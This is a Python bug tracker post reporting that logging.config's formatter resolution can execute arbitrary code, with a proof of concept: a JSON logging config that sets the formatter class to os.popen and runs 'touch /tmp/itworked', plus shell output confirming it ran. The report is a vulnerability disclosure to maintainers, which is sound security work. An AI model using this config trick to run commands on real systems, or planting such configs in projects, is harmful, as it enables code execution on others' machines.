[New-bugs-announce] [issue46251] logger.config.configure_formatter executes arbitrary code

[MarkBaggett]

New submission from MarkBaggett <lo127001 at gmail.com>:

I know there are multiple warnings about the use of eval() in the listener. But _resolve() and resolve() used by both fileConfig and dictConfig also seem like they can also be abused. Here is a working example.

$ ls /tmp/itworked 
ls: cannot access '/tmp/itworked': No such file or directory
$ cat log.config 
{
    "version":1,
    "formatters":{
        "EXPLOIT":{
            "class": "os.popen",
            "format": "touch /tmp/itworked",
            "datefmt": "r",
            "style": 1

        }
    }
}

$ python calculator.py 
/usr/lib/python3.8/subprocess.py:848: RuntimeWarning: line buffering (buffering=1) isn't supported in binary mode, the default buffer size will be used
  self.stdout = io.open(c2pread, 'rb', bufsize)
WARNING:calculator.support_functions:Internet Confirmed.
WARNING:calculator.support_functions:Adder object exported!
WARNING:calculator.support_functions.adder:Set initial value to 0
WARNING:calculator:The result is 15
$ ls /tmp/itworked 
/tmp/itworked

I could probably clean up that error message if I took 2 minute to refresh my os.popen knowledge, but I think you get the point. Are you aware of this issue?

Thanks for all you to on this import module!

----------
messages: 409623
nosy: MarkBaggett
priority: normal
severity: normal
status: open
title: logger.config.configure_formatter executes arbitrary code
type: security
versions: Python 3.10

_______________________________________
Python tracker <report at bugs.python.org>
<https://bugs.python.org/issue46251>
_______________________________________